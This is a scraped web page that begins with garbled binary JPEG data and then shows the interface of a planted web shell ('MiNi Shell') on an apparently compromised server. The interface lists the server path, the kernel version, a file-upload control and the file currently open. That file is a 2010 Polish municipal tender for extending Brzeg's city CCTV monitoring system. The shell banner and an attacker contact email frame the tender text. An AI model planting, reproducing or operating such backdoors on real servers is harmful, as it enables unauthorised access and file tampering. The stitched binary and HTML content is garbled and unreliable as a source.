JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100826/231699-N-2010.html

<p class="kh_header"><b>Brzeg: Rozbudowa systemu monitoringu miasta Brzeg II etap ostatni 2010.</b><br>
<b>Numer ogłoszenia: 231699 - 2010; data zamieszczenia: 26.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Brzeg - Burmistrz Miasta Brzegu , ul. Robotnicza 12, 49-300 Brzeg, woj. opolskie, tel. 0077 4169950, faks 077 4169952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.brzeg.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa systemu monitoringu miasta Brzeg II etap ostatni 2010..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający zleca a Wykonawca zobowiązuje się do wykonania zadania pn.: Rozbudowa systemu monitoringu Miasta Brzegu - II Etap  ostatni 2010.

W ramach zadania, określonego w §1 wzoru umowy Wykonawca zobowiązuje się do:
1) uzgodnienia i wykonania zasilania punktów kamerowych,
2) przeprowadzenia działań formalnych niezbędnych do zainstalowania kamer na budynkach znajdujących się na terenie miasta Brzeg,
3) zakupu i montażu całości sprzętu wchodzącego w zakres projektu,
4) zsynchronizowania rozbudowanego systemu z systemem istniejącym,
5) ułożenia kabli miedzianych i światłowodowych w rurach i korytach PCV oraz podziemnej kanalizacji  teletechnicznej,
6) wykonania przewiertów w ścianach i stropach budynków,
7) zainstalowania koryt kablowych PCV,
8) ułożenia wymaganych przewodów zasilających i sygnałowych w rurach ochronnych, korytach i przepustach w ścianach i stropach,
9) wyposażenie systemu  wizyjnego miasta                                                             
10) uruchomienia systemu, przeszkolenia obsługi, wstępnego przetestowania systemu z udziałem obsługi wskazanej przez Zamawiającego.
Całość prac określonych umową Wykonawca zobowiązuje się wykonać zgodnie z projektem wykonawczym i przedmiarem robót, które stanowią integralną część umowy. 
W ramach wykonania przedmiotu umowy Wykonawca zobowiązuje się do nadzorowania sprawności działania całego sytemu monitoringu działającego na terenie miasta Brzegu, przez okres 24 miesięcy od dnia podpisania protokółu odbioru. 
W ramach nadzorowania sprawności działania całego sytemu monitoringu działającego na terenie miasta Brzeg, Wykonawca zobowiązuje się do bieżącego usuwania stwierdzonych nieprawidłowości w działaniu tego systemu niezwłocznie, nie później niż w terminie 7 dni od daty pisemnego zgłoszenia tych nieprawidłowości Wykonawcy.

Całość prac określonych umową Wykonawca zobowiązuje się wykonać przy użyciu materiałów zakupionych przez Wykonawcę oraz  przy użyciu urządzeń,   narzędzi oraz sprzętu będących w dyspozycji Wykonawcy. 

Wykonawca zobowiązuje się uzgodnić i uzyskać zgodę podmiotów uprawnionych do władania nieruchomością na cele budowlane oraz przeprowadzenia wszelkich działań formalno-prawnych, w tym wszelkich uzgodnień, pozwoleń, decyzji niezbędnych do zainstalowania kamer na budynkach znajdujących się na terenie miasta Brzegu. Koszty opłat, w tym opłat administracyjnych w celu przeprowadzenia wszelkich działań formalno-prawnych, o których mowa w zdaniu poprzednim ponosi Wykonawca.
Po zakończeniu robót Wykonawca zobowiązany jest uporządkować teren, na którym wykonywane były te roboty.
Wykonawca zobowiązany jest do ubezpieczenia się od odpowiedzialności cywilnej za szkody oraz następstwa nieszczęśliwych wypadków dotyczących pracowników i osób trzecich, a  powstałych w związku z prowadzonymi robotami budowlanymi, w tym także ruchem  pojazdów mechanicznych, dźwigów itp. Wykonawca ponosi odpowiedzialność za wszelkie szkody w mieniu, w tym w mieniu osób trzecich, powstałe w związku z robotami prowadzonymi przez Wykonawcę.
Roboty stanowiące przedmiot umowy wykonywane będą zgodnie z umową oraz przedmiarem robót i projektem wykonawczym a także sztuką budowlaną i zasadami obowiązującymi przy prowadzeniu robót elektrycznych, obowiązującymi przepisami prawa, Polskimi Normami oraz zasadami współczesnej wiedzy technicznej, zapewniając bezpieczne i higieniczne warunki pracy.  
Materiały i urządzenia zastosowane przy realizacji przedmiotu umowy powinny odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, określonych w art. 10 ustawy Prawo Budowlane i przepisach wykonawczych do tej ustawy oraz być zgodne z projektem wykonawczym. 
Na każde żądanie Zamawiającego lub działającego w jego imieniu inspektora nadzoru inwestorskiego, Wykonawca zobowiązany jest okazać w stosunku do wskazanych materiałów:  certyfikat na znak bezpieczeństwa, deklarację zgodności lub certyfikat zgodności z Polską Normą lub aprobatą techniczną.
Kwota wynagrodzenia wymieniona w §10 ust. 2 wzoru umowy zawiera wszystkie koszty związane z realizacją przedmiotu umowy wynikające wprost z projektu wykonawczego i przedmiaru robot, jak również koszty nie ujęte w dokumentacji projektowej, a niezbędne do wykonania przedmiotu umowy, w szczególności zakup niezbędnych urządzeń, materiałów, koszty pracy sprzętu, koszty robocizny, koszty wszelkich opłat, w tym opłat za zajęcie pasa drogowego (wg obowiązujących przepisów).
Wynagrodzenie Wykonawcy obejmuje także wykonywanie nadzoru nad całym systemem monitoringu, o którym mowa w § 2 ust. 3 wzoru umowy, przez okres wskazany w tym postanowieniu.
Strony postanawiają, że rozliczenie za wykonanie przedmiotu umowy określonego w § 2 ust. 1 wzoru umowy nastąpi, po odbiorze całości prac określonych umową, potwierdzonym protokołem odbioru i pisemnym potwierdzeniem przez inspektora nadzoru inwestorskiego na podstawie prawidłowo wystawionej faktury. 
Wykonawca zobowiązuje się do wystawienia faktury w terminie 7 dni od daty podpisania protokółu odbioru przedmiotu umowy.
Podstawa wystawienia faktury VAT przez Wykonawcę będzie podpisany protokół odbioru, o którym mowa w §12 ust. 6 oraz protokół, o którym mowa w §12 ust.7 wzoru umowy.
Wynagrodzenie Wykonawcy płatne będzie jednorazowo przelewem na wskazane przez niego konto w terminie 30 dni od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT. 
Strony postanawiają, że przedmiotem odbioru będzie całość prac określonych w §2 ust. 1 wzoru umowy. Nie dopuszcza się odbiorów częściowych.
Wykonawca zgłosi pisemnie Zamawiającemu gotowość do odbioru. 
Zamawiający po zgłoszeniu gotowości odbioru wyznacza termin rozpoczęcia i odbioru przedmiotu umowy zawiadamiając o tym Wykonawcę i innych uczestników procesu inwestycyjnego.

Zamawiający powołuje komisję odbioru i jej przewodniczącego z ramienia Zamawiającego.
Do odbioru wykonanych robót Wykonawca powinien przedłożyć:
- aktualną dokumentację powykonawczą,
- protokóły prób montażowych i pomiarów, 
- oświadczenie wykonawcy o zakończeniu robót i gotowości systemu do eksploatacji,
- instrukcje eksploatacji urządzeń i systemu w języku polskim,
- wymagane atesty i certyfikaty użytych materiałów i urządzeń.
Dokumentem potwierdzającym wykonanie przez Wykonawcę zobowiązań określonych wzorem umowy będzie protokół podpisany przez strony umowy lub ich umocowanych przedstawicieli.
W przypadku stwierdzenia wad w toku czynności odbioru przedmiotu umowy, Zamawiający może odmówić odbioru przedmiotu umowy do czasu usunięcia wad w terminie wyznaczonym przez Zamawiającego. 

Strony postanawiają, iż termin gwarancji na wykonane prace określone wzorem umowy wynosi 24 miesiące licząc od daty odbioru. W dniu podpisania protokółu odbioru robót Wykonawca zobowiązuje się przekazać Zamawiającemu stosowne dokumenty gwarancyjne.
W dniu podpisania protokółu odbioru robót Wykonawca zobowiązuje się scedować na Zamawiającego całość uprawnień wynikających z gwarancji producenta udzielonej na zamontowane urządzenia, 
Wszelkie wady wykonanych prac w okresie rękojmi lub gwarancji, Wykonawca zobowiązuje się usuwać w terminie wyznaczonym przez Zamawiającego na ich usunięcie. W przypadku niedotrzymania tego terminu Zamawiającemu, oprócz prawa do naliczenia kar umownych, o których mowa w §15 ust. 1 lit. b) wzoru umowy, służy prawo do powierzenia wykonania tych prac bez dodatkowego wezwania osobom trzecim na koszt i ryzyko Wykonawcy na co Wykonawca niniejszym wyraża zgodę. Skorzystanie przez Zamawiającego z powyższych uprawnień pozostaje bez wpływu na zakres i uprawnienia wynikające z udzielonej przez Wykonawcę gwarancji.

Oprócz wypadków wymienionych w przepisach Kodeksu cywilnego Zamawiającemu przysługuje prawo odstąpienia od umowy w następujących sytuacjach:
a) w razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy;
b) Wykonawca nie rozpoczął robót bez uzasadnionych przyczyn lub nie kontynuuje ich pomimo wezwania Zamawiającego złożonego na piśmie.
Odstąpienie od umowy może nastąpić w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach.
W wypadku odstąpienia od umowy Wykonawcę oraz Zamawiającego obciążają następujące obowiązki:
a) w terminie 7 dni od daty odstąpienia od umowy Wykonawca przy udziale Zamawiającego sporządzi szczegółowy protokół inwentaryzacji robót w toku według stanu na dzień odstąpienia,
b) zabezpieczy przerwane roboty w zakresie obustronnie uzgodnionym na koszt tej strony z winy, której dokonano odstąpienia umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.24.00.00-7, 63.71.27.00-0, 50.31.20.00-2, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 49.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada koncesję MSWiA na ochronę techniczną osób i mienia, w zakresie montażu elektronicznych urzązeń i systemów alarmowych sygnalizujących zagrożenie osób i mienia, zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej 1 zadanie polegające na uruchomieniu systemu monitoringu miejskiego o wartości min. 100.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna warunek za spełniony, jeżeli Wykonawca wykaże, ze dysponuje minimum 1 osobą posiadającą licencję pracownika zabezpieczenia technicznego II stopnia zgodnie z ustawą o ochronie osób i mienia oraz minimum 1 osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Licencja winna być ważna na dzień składania ofert oraz może być złożona w postaci kserokopii potwierdzonej za zgodność z oryginałem przez wykonawców podpisujących ofertę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, (niezależnie od charakteru prawnego łączących go z nimi stosunków) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy  wykonaniu zamówienia ;
- pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach : 
1) wydłużenia okresu gwarancji lub rękojmi o dowolny okres,
2) zmiany danych związanych z obsługą administracyjno-organizacyjną umowy, zmiany danych teleadresowych oraz osób wskazanych do kontaktów między Stronami, 
3) konieczności zmiany w przedmiocie zamówienia, o ile zmiana ta nie powoduje zmiany wynagrodzenia Wykonawcy, 
4)  przedłużenia terminu wykonania umowy, w przypadku gdy:
a) wystąpi konieczność wykonania robót dodatkowych, których zakres i termin realizacji ma wpływ na termin wykonania umowy,
b) nastąpi przedłużenie procedur formalno-prawnych, w tym wszelkich uzgodnień, pozwoleń, decyzji niezbędnych do zainstalowania kamer na budynkach znajdujących się na terenie miasta Brzegu, z przyczyn nie leżących po stronie Wykonawcy, 
c) zmiana terminu wykonania umowy wynikła z przyczyn nieprzewidzianych przy zawarciu umowy,
5) wydania decyzji administracyjnej lub orzeczenia uprawnionego organu nakazujące   
Wykonawcy wstrzymanie wykonywanych robót budowlanych,
6) wystąpienia zmiany przepisów lub rzeczywistej zmiany warunków podczas  wykonywania  robót powodującej konieczność aktualizacji dokumentacji projektowej, uzyskania dodatkowych opinii lub uzgodnień,
7) wystąpienia zmiana technologii robót związana z postępem technicznym,
8) wycofania z produkcji zaprojektowane maszyny, urządzenia lub materiały
9) wystąpienia nieprzewidzianych przy zawarciu umowy utrudnień realizacji robót,
10) wystąpienia siły wyższej w rozumieniu przepisów kodeksu cywilnego. 
11) w przypadku konieczności zmiany pozostałych postanowień umowy nie stanowiących treści oferty Wykonawcy, 
12) gdy zmiana umowy jest korzystna lub obojętna z punktu widzenia Zamawiającego.
Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze Stron, za zgodą drugiej Strony umowy, na podstawie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.brzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Brzeg
ul. Robotnicza 12
49-300 Brzeg ( pok. nr 9 - parter, bud. A).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2010 godzina 08:30, miejsce: Urzad Miasta Brzeg, 
ul. Robotnicza 12
49-300 Brzeg (biuro podawcze - parter, budynek A).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com